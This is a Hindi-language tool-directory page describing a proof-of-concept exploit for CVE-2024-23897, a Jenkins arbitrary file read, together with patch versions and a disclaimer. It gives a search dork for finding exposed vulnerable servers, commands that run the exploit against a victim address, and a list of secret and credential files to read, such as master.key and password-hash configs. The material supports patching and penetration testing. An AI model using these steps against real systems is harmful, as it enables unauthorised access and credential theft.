Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-23897 — POC - Jenkins File Read Vulnerability - CVE-2024-23897 | Kitploit
उपकरण/GitHubGitHub/verylazytech/cve-2024-23897
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubverylazytech/cve-2024-23897

CVE-2024-23897

POC - Jenkins File Read Vulnerability - CVE-2024-23897

रिपॉजिटरी देखें
1071 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

जेनकिंस फ़ाइल पढ़ने की कमजोरी - CVE-2024-23897

My Shop Medium Github Buy Me A Coffee

CVE-2024-23897 जेनकिंस में एक गंभीर कमजोरी है जो अप्रमाणित हमलावरों को जेनकिंस नियंत्रक के फ़ाइल सिस्टम पर मनमानी फ़ाइलों को पढ़ने की अनुमति देती है। यह दोष args4j लाइब्रेरी में कमांड तर्कों के अनुचित हैंडलिंग से उत्पन्न होता है, विशेष रूप से कमांड-लाइन संचालनों में जहां @ वर्ण के बाद फ़ाइल पथ अनधिकृत फ़ाइल सामग्री के प्रदर्शन का कारण बन सकता है।

यह कमजोरी एक महत्वपूर्ण जोखिम पैदा करती है क्योंकि यह हमलावरों को संवेदनशील जानकारी, जैसे क्रिप्टोग्राफिक कुंजियाँ और कॉन्फ़िगरेशन फ़ाइलें, तक पहुँचने में सक्षम बना सकती है, जिसका उपयोग आगे के शोषण के लिए किया जा सकता है, जिसमें रिमोट कोड निष्पादन (RCE) शामिल है। यह मुद्दा विशेष रूप से चिंताजनक है क्योंकि CI/CD पाइपलाइनों में जेनकिंस का व्यापक उपयोग और वैश्विक स्तर पर उजागर जेनकिंस इंस्टेंस की संख्या है।

इस कमजोरी को संबोधित करने वाला एक सुरक्षा फिक्स जेनकिंस संस्करण 2.442 और बाद में, साथ ही जेनकिंस LTS संस्करण 2.426.3 और बाद में जारी किया गया है। उपयोगकर्ताओं को दृढ़ता से सलाह दी जाती है कि वे इस जोखिम को कम करने और संवेदनशील जानकारी की रक्षा के लिए अपने जेनकिंस इंस्टॉलेशन को अपग्रेड करें।

इसके बारे में पढ़ें — CVE-2024-23897

अस्वीकरण: यह प्रूफ ऑफ कॉन्सेप्ट (POC) केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व पारस्परिक सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

आरंभ करना

लक्ष्य ढूँढना

संभावित लक्ष्य खोजने के लिए, Fofa (Shodan.io के समान) का उपयोग करें:

  • Fofa Dork: header="X-Jenkins: 2.426.2"

प्रभावित जेनकिंस संस्करणों में 2.441 तक और जेनकिंस LTS के लिए 2.426.2 तक शामिल हैं।

रिपॉजिटरी को क्लोन करें:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-23897

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2024-23897.py -u <Victim_ip:port>

Alt text

वह फ़ाइल दर्ज करें जिसे आप शेल में पढ़ना चाहते हैं (इस मामले में /etc/passwd): Alt text

कुछ फ़ाइलें जो रुचिकर हो सकती हैं:

  • /proc/self/environ पर्यावरण चर जिनमें JENKINS_HOME शामिल है
  • /proc/self/cmdline कमांड-लाइन तर्क
  • /var/jenkins_home/users/users.xml उपयोगकर्ता खाता भंडारण स्थान
  • /var/jenkins_home/users/<user_directory>/config.xml उपयोगकर्ता BCrypt पासवर्ड हैश
  • /var/jenkins_home/secrets/master.key एन्क्रिप्शन गुप्त कुंजी
  • /etc/hosts लिनक्स स्थानीय-DNS समाधान
  • /etc/passwd लिनक्स उपयोगकर्ता खाते

सामान्य उपयोग:

root@kitploit:~
usage: python3 CVE-2024-23897.py [-h] -u URL [-f FILE] [-t TIMEOUT] [-s] [-o] [-p PROXY] [-v]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Jenkins URL
  -f FILE, --file FILE  File path to read
  -t TIMEOUT, --timeout TIMEOUT
                        Request timeout
  -s, --save            Save file contents
  -o, --overwrite       Overwrite existing files
  -p PROXY, --proxy PROXY
                        HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag
टूल डाउनलोड करें